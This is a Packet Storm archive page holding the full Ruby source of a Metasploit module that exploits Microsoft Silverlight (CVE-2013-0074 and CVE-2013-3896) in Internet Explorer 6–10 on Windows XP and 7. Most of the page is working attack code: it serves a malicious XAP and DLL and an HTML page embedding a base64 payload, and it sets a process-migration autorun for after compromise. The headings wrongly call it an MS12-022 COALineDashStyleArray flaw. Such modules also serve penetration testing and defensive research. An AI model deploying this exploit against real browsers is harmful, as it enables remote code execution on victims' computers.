accept no compromises

Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access

Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access
Posted Nov 26, 2013
Authored by Vitaliy Toropov, juan vazquez, James Forshaw | Site metasploit.com

This Metasploit module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible to dereference arbitrary memory which easily leverages to arbitrary code execution. In order to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class from System.Windows.dll. This Metasploit module has been tested successfully on IE6 - IE10, Windows XP SP3 / Windows 7 SP1 on both x32 and x64 architectures.

tags | exploit, arbitrary, code execution, bug bounty, packet storm
systems | windows, xp, 7
advisories | CVE-2013-0074, CVE-2013-3896, OSVDB-91147, OSVDB-98223
MD5 | db77ce1a58c39fd936f1e6241e3e85cb

Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::BrowserExploitServer

MANIFEST = <<-EOS
<Deployment xmlns="http://schemas.microsoft.com/client/2007/deployment" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" EntryPointAssembly="SilverApp1" EntryPointType="SilverApp1.App" RuntimeVersion="4.0.50826.0">
<Deployment.Parts>
<AssemblyPart x:Name="SilverApp1" Source="SilverApp1.dll" />
</Deployment.Parts>
</Deployment>
EOS

def initialize(info={})
super(update_info(info,
'Name' => "MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access",
'Description' => %q{
This module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on
the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an
unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible
to dereference arbitrary memory which easily leverages to arbitrary code execution. In order
to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class
from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP
SP3 / Windows 7 SP1 on both x32 and x64 architectures.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Forshaw', # RCE Vulnerability discovery
'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-0074' ],
[ 'CVE', '2013-3896' ],
[ 'OSVDB', '91147' ],
[ 'OSVDB', '98223' ],
[ 'BID', '58327' ],
[ 'BID', '62793' ],
[ 'MSB', 'MS13-022' ],
[ 'MSB', 'MS13-087' ],
[ 'URL', 'http://packetstormsecurity.com/files/123731/' ]
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X86_64],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => Msf::OperatingSystems::WINDOWS,
:ua_name => Msf::HttpClients::IE
},
'Targets' =>
[
[ 'Windows x86',
{
'arch' => ARCH_X86
}
],
[ 'Windows x64',
{
'arch' => ARCH_X86_64
}
]
],
'Privileged' => false,
'DisclosureDate' => "Mar 12 2013",
'DefaultTarget' => 0))

end

def setup
@xap_name = "#{rand_text_alpha(5 + rand(5))}.xap"
@dll_name = "#{rand_text_alpha(5 + rand(5))}.dll"
File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2013-0074", "SilverApp1.xap" ), "rb") { |f| @xap = f.read }
File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2013-0074", "SilverApp1.dll" ), "rb") { |f| @dll = f.read }
@xaml = MANIFEST.gsub(/SilverApp1\.dll/, @dll_name)
super
end

def exploit_template(cli, target_info)

my_payload = get_payload(cli, target_info)

# Align to 4 bytes the x86 payload
if target_info[:arch] == ARCH_X86
while my_payload.length % 4 != 0
my_payload = "\x90" + my_payload
end
end

my_payload = Rex::Text.encode_base64(my_payload)

html_template = <<-EOF
<html>
<!-- saved from url=(0014)about:internet -->
<head>
<title>Silverlight Application</title>
<style type="text/css">
html, body { height: 100%; overflow: auto; }
body { padding: 0; margin: 0; }
#form1 { height: 99%; }
#silverlightControlHost { text-align:center; }
</style>
</head>
<body>
<form id="form1" runat="server" >
<div id="silverlightControlHost">
<object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%">
<param name="source" value="<%= @xap_name %>"/>
<param name="background" value="white" />
<param name="InitParams" value="payload=<%= my_payload %>" />
</object>
</div>
</form>
</body>
</html>
EOF

return html_template, binding()
end

def on_request_exploit(cli, request, target_info)
print_status("request: #{request.uri}")
if request.uri =~ /#{@xap_name}$/
print_status("Sending XAP...")
send_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })
elsif request.uri =~ /#{@dll_name}$/
print_status("Sending DLL...")
send_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })
elsif request.uri =~ /AppManifest.xaml$/
print_status("Sending XAML...")
send_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })
else
print_status("Sending HTML...")
send_exploit_html(cli, exploit_template(cli, target_info))
end
end

end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    2 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close